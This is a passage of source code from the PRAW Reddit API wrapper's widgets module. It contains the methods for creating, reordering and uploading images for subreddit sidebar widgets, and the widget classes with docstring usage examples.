'fillColor': '#0000FF'
}
},
{
'kind': 'image',
'text': 'View documentation',
'linkUrl': 'https://praw.readthedocs.io',
'url': my_image,
'height': 200,
'width': 200,
'hoverState': {
'kind': 'image',
'url': my_image,
'height': 200,
'width': 200
}
}
]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_button_widget(
'Things to click', 'Click some of these *cool* links!',
buttons, styles)
"""
button_widget = {
"buttons": buttons,
"description": description,
"kind": "button",
"shortName": short_name,
"styles": styles,
}
button_widget.update(other_settings)
return self._create_widget(button_widget)
def add_calendar(
self,
short_name,
google_calendar_id,
requires_sync,
configuration,
styles,
**other_settings
):
"""Add and return a :class:`.Calendar` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param google_calendar_id: An email-style calendar ID. To share a
Google Calendar, make it public,
then find the "Calendar ID."
:param requires_sync: A ``bool``.
:param configuration: A ``dict`` as specified in `Reddit docs`_.
Example:
.. code-block:: python
{'numEvents': 10,
'showDate': True,
'showDescription': False,
'showLocation': False,
'showTime': True,
'showTitle': True}
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
config = {'numEvents': 10,
'showDate': True,
'showDescription': False,
'showLocation': False,
'showTime': True,
'showTitle': True}
cal_id = '[email protected]'
new_widget = widget_moderation.add_calendar('Upcoming Events',
cal_id, True,
config, styles)
"""
calendar = {
"shortName": short_name,
"googleCalendarId": google_calendar_id,
"requiresSync": requires_sync,
"configuration": configuration,
"styles": styles,
"kind": "calendar",
}
calendar.update(other_settings)
return self._create_widget(calendar)
def add_community_list(self, short_name, data, styles, **other_settings):
"""Add and return a :class:`.CommunityList` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param data: A ``list`` of subreddits. Subreddits can be represented as
``str`` (e.g. the string ``'redditdev'``) or as
:class:`.Subreddit` (e.g.
``reddit.subreddit('redditdev')``). These types may be
mixed within the list.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
subreddits = ['learnpython', reddit.subreddit('redditdev')]
new_widget = widget_moderation.add_community_list('My fav subs',
subreddits,
styles)
"""
community_list = {
"data": [str(datum) for datum in data],
"kind": "community-list",
"shortName": short_name,
"styles": styles,
}
community_list.update(other_settings)
return self._create_widget(community_list)
def add_custom_widget(
self,
short_name,
text,
css,
height,
image_data,
styles,
**other_settings
):
r"""Add and return a :class:`.CustomWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param text: The Markdown text displayed in the widget.
:param css: The CSS for the widget, no longer than 100000 characters.
.. note::
As of this writing, Reddit will not accept empty CSS. If you
wish to create a custom widget without CSS, consider using
``'/**/'`` (an empty comment) as your CSS.
:param height: The height of the widget, between 50 and 500.
:param image_data: A ``list`` of ``dict``\ s as specified in
`Reddit docs`_. Each ``dict`` represents an image and has the
key ``'url'`` which maps to the URL of an image hosted on
Reddit's servers. Images should be uploaded using
:meth:`.upload_image`.
Example:
.. code-block:: python
[{'url': 'https://some.link', # from upload_image()
'width': 600, 'height': 450,
'name': 'logo'},
{'url': 'https://other.link', # from upload_image()
'width': 450, 'height': 600,
'name': 'icon'}]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
image_urls = [widget_moderation.upload_image(img_path)
for img_path in image_paths]
image_dicts = [{'width': 600, 'height': 450, 'name': 'logo',
'url': image_urls[0]},
{'width': 450, 'height': 600, 'name': 'icon',
'url': image_urls[1]}]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_custom_widget('My widget',
'# Hello world!',
'/**/', 200,
image_dicts, styles)
"""
custom_widget = {
"css": css,
"height": height,
"imageData": image_data,
"kind": "custom",
"shortName": short_name,
"styles": styles,
"text": text,
}
custom_widget.update(other_settings)
return self._create_widget(custom_widget)
def add_image_widget(self, short_name, data, styles, **other_settings):
r"""Add and return an :class:`.ImageWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param data: A ``list`` of ``dict``\ s as specified in `Reddit docs`_.
Each ``dict`` has the key ``'url'`` which maps to the URL
of an image hosted on Reddit's servers. Images should
be uploaded using :meth:`.upload_image`.
Example:
.. code-block:: python
[{'url': 'https://some.link', # from upload_image()
'width': 600, 'height': 450,
'linkUrl': 'https://github.com/praw-dev/praw'},
{'url': 'https://other.link', # from upload_image()
'width': 450, 'height': 600,
'linkUrl': 'https://praw.readthedocs.io'}]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}``.
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
image_dicts = [{'width': 600, 'height': 450, 'linkUrl': '',
'url': widget_moderation.upload_image(img_path)}
for img_path in image_paths]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_image_widget('My cool pictures',
image_dicts, styles)
"""
image_widget = {
"data": data,
"kind": "image",
"shortName": short_name,
"styles": styles,
}
image_widget.update(other_settings)
return self._create_widget(image_widget)
def add_menu(self, data, **other_settings):
r"""Add and return a :class:`.Menu` widget.
:param data: A ``list`` of ``dict``\ s describing menu contents, as
specified in `Reddit docs`_. As of this writing, the format is:
.. code-block:: none
[
{
"text": a string no longer than 20 characters,
"url": a valid URL
},
OR
{
"children": [
{
"text": a string no longer than 20 characters,
"url": a valid URL,
},
...
],
"text": a string no longer than 20 characters,
},
...
]
.. _Reddit docs: https://www.reddit.com/dev/api#POST_api_widget
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
menu_contents = [
{'text': 'My homepage', 'url': 'https://example.com'},
{'text': 'Python packages',
'children': [
{'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},
{'text': 'requests', 'url': 'http://python-requests.org'}
]},
{'text': 'Reddit homepage', 'url': 'https://reddit.com'}
]
new_widget = widget_moderation.add_menu(menu_contents)
"""
menu = {"data": data, "kind": "menu"}
menu.update(other_settings)
return self._create_widget(menu)
def add_post_flair_widget(
self, short_name, display, order, styles, **other_settings
):
"""Add and return a :class:`.PostFlairWidget`.
:param short_name: A name for the widget, no longer than 30 characters.
:param display: Display style. Either ``'cloud'`` or ``'list'``.
:param order: A ``list`` of flair template IDs. You can get all flair
template IDs in a subreddit with:
.. code-block:: python
flairs = [f['id'] for f in subreddit.flair.link_templates]
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
subreddit = reddit.subreddit('mysub')
widget_moderation = subreddit.widgets.mod
flairs = [f['id'] for f in subreddit.flair.link_templates]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_post_flair_widget('Some flairs',
'list',
flairs, styles)
"""
post_flair = {
"kind": "post-flair",
"display": display,
"shortName": short_name,
"order": order,
"styles": styles,
}
post_flair.update(other_settings)
return self._create_widget(post_flair)
def add_text_area(self, short_name, text, styles, **other_settings):
"""Add and return a :class:`.TextArea` widget.
:param short_name: A name for the widget, no longer than 30 characters.
:param text: The Markdown text displayed in the widget.
:param styles: A ``dict`` with keys ``backgroundColor`` and
``headerColor``, and values of hex colors. For example,
``{'backgroundColor': '#FFFF66', 'headerColor':
'#3333EE'}``.
Example usage:
.. code-block:: python
widget_moderation = reddit.subreddit('mysub').widgets.mod
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
new_widget = widget_moderation.add_text_area('My cool title',
'*Hello* **world**!',
styles)
"""
text_area = {
"shortName": short_name,
"text": text,
"styles": styles,
"kind": "textarea",
}
text_area.update(other_settings)
return self._create_widget(text_area)
def reorder(self, new_order, section="sidebar"):
"""Reorder the widgets.
:param new_order: A list of widgets. Represented as a ``list`` that
contains ``Widget`` objects, or widget IDs as strings. These types
may be mixed.
:param section: The section to reorder. (default: ``'sidebar'``)
Example usage:
.. code-block:: python
widgets = reddit.subreddit('mysub').widgets
order = list(widgets.sidebar)
order.reverse()
widgets.mod.reorder(order)
"""
order = [
thing.id if isinstance(thing, Widget) else str(thing)
for thing in new_order
]
path = API_PATH["widget_order"].format(
subreddit=self._subreddit, section=section
)
self._reddit.patch(
path, data={"json": dumps(order), "section": section}
)
def upload_image(self, file_path):
"""Upload an image to Reddit and get the URL.
:param file_path: The path to the local file.
:returns: The URL of the uploaded image as a ``str``.
This method is used to upload images for widgets. For example,
it can be used in conjunction with :meth:`.add_image_widget`,
:meth:`.add_custom_widget`, and :meth:`.add_button_widget`.
Example usage:
.. code-block:: python
my_sub = reddit.subreddit('my_sub')
image_url = my_sub.widgets.mod.upload_image('/path/to/image.jpg')
images = [{'width': 300, 'height': 300,
'url': image_url, 'linkUrl': ''}]
styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
my_sub.widgets.mod.add_image_widget('My cool pictures', images,
styles)
"""
img_data = {
"filepath": os.path.basename(file_path),
"mimetype": "image/jpeg",
}
if file_path.lower().endswith(".png"):
img_data["mimetype"] = "image/png"
url = API_PATH["widget_lease"].format(subreddit=self._subreddit)
# until we learn otherwise, assume this request always succeeds
upload_lease = self._reddit.post(url, data=img_data)["s3UploadLease"]
upload_data = {
item["name"]: item["value"] for item in upload_lease["fields"]
}
upload_url = "https:{}".format(upload_lease["action"])
with open(file_path, "rb") as image:
response = self._reddit._core._requestor._http.post(
upload_url, data=upload_data, files={"file": image}
)
response.raise_for_status()
return upload_url + "/" + upload_data["key"]
class Widget(PRAWBase):
    """Base class to represent a Widget."""

    @property
    def mod(self):
        """Get an instance of :class:`.WidgetModeration` for this widget.

        .. note::
           Using any of the methods of :class:`.WidgetModeration` will likely
           make outdated the data in the :class:`.SubredditWidgets` that this
           widget belongs to. To remedy this, call
           :meth:`~.SubredditWidgets.refresh`.
        """
        # Lazily create and cache the moderation helper.
        if self._mod is None:
            self._mod = WidgetModeration(self, self.subreddit, self._reddit)
        return self._mod

    def __eq__(self, other):
        """Check equality against another object.

        Widget IDs are compared case-insensitively; non-Widget values are
        compared against this widget's ID via ``str``.
        """
        own_id = self.id.lower()
        if isinstance(other, Widget):
            return own_id == other.id.lower()
        return own_id == str(other).lower()

    # pylint: disable=invalid-name
    def __init__(self, reddit, _data):
        """Initialize an instance of the class."""
        # Fallback values in case the keys are absent from ``_data``.
        self.subreddit = ""
        self.id = ""
        super(Widget, self).__init__(reddit, _data=_data)
        self._mod = None
class ButtonWidget(Widget, BaseList):
    r"""Class to represent a widget containing one or more buttons.

    Find an existing one:

    .. code-block:: python

       button_widget = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.ButtonWidget):
               button_widget = widget
               break

       for button in button_widget:
           print(button.text, button.url)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       buttons = [
           {
               'kind': 'text',
               'text': 'View source',
               'url': 'https://github.com/praw-dev/praw',
               'color': '#FF0000',
               'textColor': '#00FF00',
               'fillColor': '#0000FF',
               'hoverState': {
                   'kind': 'text',
                   'text': 'ecruos weiV',
                   'color': '#000000',
                   'textColor': '#FFFFFF',
                   'fillColor': '#0000FF'
               }
           },
           {
               'kind': 'text',
               'text': 'View documentation',
               'url': 'https://praw.readthedocs.io',
               'color': '#FFFFFF',
               'textColor': '#FFFF00',
               'fillColor': '#0000FF'
           },
       ]
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       button_widget = widgets.mod.add_button_widget(
           'Things to click', 'Click some of these *cool* links!',
           buttons, styles)

    For more information on creation, see :meth:`.add_button_widget`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       button_widget = button_widget.mod.update(shortName='My fav buttons',
                                                styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       button_widget.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``buttons``             A ``list`` of :class:`.Button`\ s. These can also
                            be accessed just by iterating over the
                            :class:`.ButtonWidget` (e.g. ``for button in
                            button_widget``).
    ``description``         The description, in Markdown.
    ``description_html``    The description, in HTML.
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'button'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the button widget belongs
                            to.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its Button objects.
    CHILD_ATTRIBUTE = "buttons"
class Calendar(Widget):
    r"""Class to represent a calendar widget.

    Find an existing one:

    .. code-block:: python

       calendar = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.Calendar):
               calendar = widget
               break

       print(calendar.googleCalendarId)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       config = {'numEvents': 10,
                 'showDate': True,
                 'showDescription': False,
                 'showLocation': False,
                 'showTime': True,
                 'showTitle': True}
       cal_id = '[email protected]'
       calendar = widgets.mod.add_calendar(
           'Upcoming Events', cal_id, True, config, styles)

    For more information on creation, see :meth:`.add_calendar`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       calendar = calendar.mod.update(shortName='My fav events',
                                      styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       calendar.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``configuration``       A ``dict`` describing the calendar configuration.
    ``data``                A ``list`` of ``dict``\ s that represent events.
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'calendar'``).
    ``requiresSync``        A ``bool``.
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the calendar widget
                            belongs to.
    ======================= ===================================================
    """
class CommunityList(Widget, BaseList):
    r"""Class to represent a Related Communities widget.

    Find an existing one:

    .. code-block:: python

       community_list = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.CommunityList):
               community_list = widget
               break

       print(community_list)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       subreddits = ['learnpython', reddit.subreddit('announcements')]
       community_list = widgets.mod.add_community_list('Related subreddits',
                                                       subreddits, styles)

    For more information on creation, see :meth:`.add_community_list`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       community_list = community_list.mod.update(shortName='My fav subs',
                                                  styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       community_list.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``data``                A ``list`` of :class:`.Subreddit`\ s. These can
                            also be iterated over by iterating over the
                            :class:`.CommunityList` (e.g. ``for sub in
                            community_list``).
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'community-list'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the community list belongs
                            to.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its Subreddit objects.
    CHILD_ATTRIBUTE = "data"
class CustomWidget(Widget):
    """Class to represent a custom widget.

    Find an existing one:

    .. code-block:: python

       custom = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.CustomWidget):
               custom = widget
               break

       print(custom.text)
       print(custom.css)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       custom = widgets.mod.add_custom_widget(
           'My custom widget', '# Hello world!', '/**/', 200, [], styles)

    For more information on creation, see :meth:`.add_custom_widget`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       custom = custom.mod.update(shortName='My fav customization',
                                  styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       custom.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``css``                 The CSS of the widget, as a ``str``.
    ``height``              The height of the widget, as an ``int``.
    ``id``                  The widget ID.
    ``imageData``           A ``list`` of :class:`.ImageData` that belong to
                            the widget.
    ``kind``                The widget kind (always ``'custom'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``stylesheetUrl``       A link to the widget's stylesheet.
    ``subreddit``           The :class:`.Subreddit` the custom widget belongs
                            to.
    ``text``                The text contents, as Markdown.
    ``textHtml``            The text contents, as HTML.
    ======================= ===================================================
    """

    def __init__(self, reddit, _data):
        """Initialize the class.

        Wraps each raw ``imageData`` entry in an :class:`.ImageData`
        instance before handing ``_data`` to the base class.
        """
        # ``.mod.update()`` may return a payload without an 'imageData'
        # field, just like the 'mods'/'data' fields guarded for in
        # ModeratorsWidget and RulesWidget; default to an empty list
        # instead of raising KeyError.
        _data["imageData"] = [
            ImageData(reddit, data) for data in _data.pop("imageData", [])
        ]
        super(CustomWidget, self).__init__(reddit, _data=_data)
class IDCard(Widget):
    """Class to represent an ID card widget.

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       id_card = widgets.id_card
       print(id_card.subscribersText)

    Update one (requires proper moderator permissions):

    .. code-block:: python

       widgets.id_card.mod.update(currentlyViewingText='Bots')

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    =========================== ===============================================
    Attribute                   Description
    =========================== ===============================================
    ``currentlyViewingCount``   The number of Redditors viewing the subreddit.
    ``currentlyViewingText``    The text displayed next to the view count. For
                                example, "users online".
    ``description``             The subreddit description.
    ``id``                      The widget ID.
    ``kind``                    The widget kind (always ``'id-card'``).
    ``shortName``               The short name of the widget.
    ``styles``                  A ``dict`` with the keys ``'backgroundColor'``
                                and ``'headerColor'``.
    ``subreddit``               The :class:`.Subreddit` the ID card belongs
                                to.
    ``subscribersCount``        The number of subscribers to the subreddit.
    ``subscribersText``         The text displayed next to the subscriber
                                count. For example, "users subscribed".
    =========================== ===============================================
    """
class ImageWidget(Widget, BaseList):
    r"""Class to represent an image widget.

    Find an existing one:

    .. code-block:: python

       image_widget = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.ImageWidget):
               image_widget = widget
               break

       for image in image_widget:
           print(image.url)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       image_paths = ['/path/to/image1.jpg', '/path/to/image2.png']
       image_dicts = [{'width': 600, 'height': 450, 'linkUrl': '',
                       'url': widgets.mod.upload_image(img_path)}
                      for img_path in image_paths]
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       image_widget = widgets.mod.add_image_widget('My cool pictures',
                                                   image_dicts, styles)

    For more information on creation, see :meth:`.add_image_widget`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       image_widget = image_widget.mod.update(shortName='My fav images',
                                              styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       image_widget.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``data``                A list of the :class:`.Image`\ s in this widget.
                            Can be iterated over by iterating over the
                            :class:`.ImageWidget` (e.g. ``for img in
                            image_widget``).
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'image'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the image widget belongs
                            to.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its Image objects.
    CHILD_ATTRIBUTE = "data"
class Menu(Widget, BaseList):
    r"""Class to represent the top menu widget of a subreddit.

    Menus can generally be found as the first item in a subreddit's top bar.

    .. code-block:: python

       topbar = reddit.subreddit('redditdev').widgets.topbar
       if len(topbar) > 0:
           probably_menu = topbar[0]
           assert isinstance(probably_menu, praw.models.Menu)
           for item in probably_menu:
               if isinstance(item, praw.models.Submenu):
                   print(item.text)
                   for child in item:
                       print('\t', child.text, child.url)
               else:  # MenuLink
                   print(item.text, item.url)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       menu_contents = [
           {'text': 'My homepage', 'url': 'https://example.com'},
           {'text': 'Python packages',
            'children': [
                {'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},
                {'text': 'requests', 'url': 'http://python-requests.org'}
            ]},
           {'text': 'Reddit homepage', 'url': 'https://reddit.com'}
       ]
       menu = widgets.mod.add_menu(menu_contents)

    For more information on creation, see :meth:`.add_menu`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       menu_items = list(menu)
       menu_items.reverse()
       menu = menu.mod.update(data=menu_items)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       menu.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``data``                A list of the :class:`.MenuLink`\ s and
                            :class:`.Submenu`\ s in this widget.
                            Can be iterated over by iterating over the
                            :class:`.Menu` (e.g. ``for item in menu``).
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'menu'``).
    ``subreddit``           The :class:`.Subreddit` the menu belongs
                            to.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its menu items.
    CHILD_ATTRIBUTE = "data"
class ModeratorsWidget(Widget, BaseList):
    r"""Class to represent a moderators widget.

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       print(widgets.moderators_widget)

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       widgets.moderators_widget.mod.update(styles=new_styles)

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'moderators'``).
    ``mods``                A list of the :class:`.Redditor`\ s that moderate
                            the subreddit. Can be iterated over by iterating
                            over the :class:`.ModeratorsWidget` (e.g. ``for
                            mod in widgets.moderators_widget``).
    ``styles``              A ``dict`` with the keys ``'backgroundColor'``
                            and ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the moderators widget
                            belongs to.
    ``totalMods``           The total number of moderators in the subreddit.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its moderators.
    CHILD_ATTRIBUTE = "mods"

    def __init__(self, reddit, _data):
        """Initialize the moderators widget."""
        # .mod.update() sometimes returns a payload without the 'mods'
        # field; fall back to an empty list so iteration still works.
        _data.setdefault(self.CHILD_ATTRIBUTE, [])
        super(ModeratorsWidget, self).__init__(reddit, _data=_data)
class PostFlairWidget(Widget, BaseList):
    r"""Class to represent a post flair widget.

    Find an existing one:

    .. code-block:: python

       post_flair_widget = None
       widgets = reddit.subreddit('redditdev').widgets
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.PostFlairWidget):
               post_flair_widget = widget
               break

       for flair in post_flair_widget:
           print(flair)
           print(post_flair_widget.templates[flair])

    Create one (requires proper moderator permissions):

    .. code-block:: python

       subreddit = reddit.subreddit('redditdev')
       widgets = subreddit.widgets
       flairs = [f['id'] for f in subreddit.flair.link_templates]
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       post_flair = widgets.mod.add_post_flair_widget('Some flairs', 'list',
                                                      flairs, styles)

    For more information on creation, see :meth:`.add_post_flair_widget`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       post_flair = post_flair.mod.update(shortName='My fav flairs',
                                          styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       post_flair.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``display``             The display style of the widget, either ``'cloud'``
                            or ``'list'``.
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'post-flair'``).
    ``order``               A list of the flair IDs in this widget.
                            Can be iterated over by iterating over the
                            :class:`.PostFlairWidget` (e.g. ``for flair_id in
                            post_flair``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the post flair widget
                            belongs to.
    ``templates``           A ``dict`` that maps flair IDs to ``dict``\ s that
                            describe flairs.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its flair template IDs.
    CHILD_ATTRIBUTE = "order"
class RulesWidget(Widget, BaseList):
    """Class to represent a rules widget.

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       rules_widget = None
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.RulesWidget):
               rules_widget = widget
               break

       from pprint import pprint; pprint(rules_widget.data)

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       rules_widget.mod.update(display='compact', shortName='The LAWS',
                               styles=new_styles)

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``data``                A list of the subreddit rules.
                            Can be iterated over by iterating over the
                            :class:`.RulesWidget` (e.g. ``for rule in
                            rules_widget``).
    ``display``             The display style of the widget, either ``'full'``
                            or ``'compact'``.
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'subreddit-rules'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'``
                            and ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the rules widget
                            belongs to.
    ======================= ===================================================
    """

    # Name of the attribute holding this widget's children; consumed by
    # BaseList to make the widget iterable over its rules.
    CHILD_ATTRIBUTE = "data"

    def __init__(self, reddit, _data):
        """Initialize the rules widget."""
        # .mod.update() sometimes returns a payload without the 'data'
        # field; fall back to an empty list so iteration still works.
